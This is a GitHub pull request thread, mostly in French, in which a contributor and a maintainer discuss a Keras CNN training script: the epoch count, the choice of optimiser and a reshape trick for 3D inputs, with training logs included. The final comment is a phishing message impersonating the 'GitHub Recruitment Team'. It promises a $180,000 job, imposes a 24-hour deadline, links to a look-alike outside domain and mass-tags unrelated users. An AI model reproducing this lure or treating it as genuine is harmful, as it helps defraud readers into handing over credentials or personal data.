### PR TITLE
Update install set up and rename preprocess def

### PR DESCRIPTION
**Pull request by r3dlight**
Bonjour,
Merci pour le code, je trouve cela très instructif ! Je vous propose un petit update du readme pour l'installation et du nom d'une fonction.
Pourriez-vous me préciser pourquoi vous ne faites qu'une seule EPOCH ?
Je n'arrive malheureusement pas à converger au delà de 70%, auriez-vous une piste à me donner ? 

Using TensorFlow backend.
Train on 82332 samples, validate on 35068 samples
Epoch 1/1
2018-12-30 12:18:28.991691: I tensorflow/core/platform/cpu_feature_guard.cc:141] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 FMA
82332/82332 [==============================] - 37s 449us/step - loss: 0.9234 - categorical_accuracy: 0.6660 - val_loss: 0.8513 - val_categorical_accuracy: 0.7093
/home/r3dlight/.local/lib/python3.6/site-packages/keras/callbacks.py:569: RuntimeWarning: Early stopping conditioned on metric `val_binary_accuracy` which is not available. Available metrics are: val_loss,val_categorical_accuracy,loss,categorical_accuracy
  (self.monitor, ','.join(list(logs.keys()))), RuntimeWarning
175341/175341 [==============================] - 17s 95us/step
loss on test data: 0.8494550091447903
accuracy on test data: 70.88131127349541 %
Saved model to disk

Thanks !

### CODE REVIEW

**Comment by felixmol** [comment]
Bonjour, 
Désolé pour le délai de réponse.

Dans le code, le nombre d'EPOCH pour le training est de 1. Cependant, vous pouvez/devez le modifier afin d'améliorer le taux de détection. En fonction de la taille de votre jeu de données et de la puissance de votre machine, vous pouvez faire 10/100 EPOCHS.

J'espère vous avoir aidé.

Félix

**Comment by r3dlight** [comment]
Bonjour,
Merci pour la réponse ! j'ai vu plus tard en lisant le code que vous aviez mis de l'EarlyStopping pour arrêter le training lorsque l'accuracy ne bouge plus justement :)
2 autres petites questions si je peux me permettre : 
- Avez vous testé d'autres algos de gradient descendant à part adam ?
- Je ne comprends pas l'astuce qui consiste à créer un tableau rempli de 1, cf : 
#hack: CNN works with 3D inputs in Keras, so change vector of size x to [1,1,x] tab 
dans model_train, pourriez-vous m'expliquer rapidement si possible ?
Merci !

**Comment by felixmol** [comment]
Bonsoir,

Alors il me semble que nous avons tenté rapidement d'autres algos et sur nos différents tests, l'optimisateur Adam de Keras rendait le mieux. Mais peut-être que nous sommes allés un peu vite sur nos conjectures. Si vous tentez d'autres optimisateurs, n'hésitez pas à nous en faire par en cas de résultats plus interessants que ceux que l'on obtient avec le Adam.

Je vais essayer de donner une explication claire et correcte.
Le x_train est une liste ou plutot un tableau en deux dimensions (càd x lignes de y features).

size = np.size(x_train,axis=1) -> cette ligne indique que vous cherchez la taille d'une ligne (axis=1), vous obtenez donc le nombre d'éléments (de features) sur la ligne que vous étudiez à chaque passage en boucle.

sample = x.reshape([size, 1, 1]) -> cette ligne permet de "remodeler" la forme de x. En effet, x est une matrice en z dimensions de type [a, b, c, d, ..., z] (1 lignes , z colonnes). Considérez qu'une liste de z éléments est en fait une liste de dimension 1 (et non z). 
Or Keras prend des arrays en dimension 3, l'astuce est donc d'inscrire notre vecteur x dans l'une des dimension puis de construire deux autres dimensions seulement avec des 1.

J'espère avoir été suffisamment clair et je vous remercie de l'interet que vous portez au projet.

Félix

**Comment by marynavoitenko** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
chrisckwong821, @mprather1, @Parker-Quinn, @IndoAltcoin, @Maimartava, @Bisquick69, @ranpo, @Agigi, @gpahal, @rhslack, @mkhb654, @weihao, @cefigueiredo, @sbagency, @meatflavourdev, @th3outcast, @zhichicao, @AN8991, @ken-y2017, @dariuszsetlak89
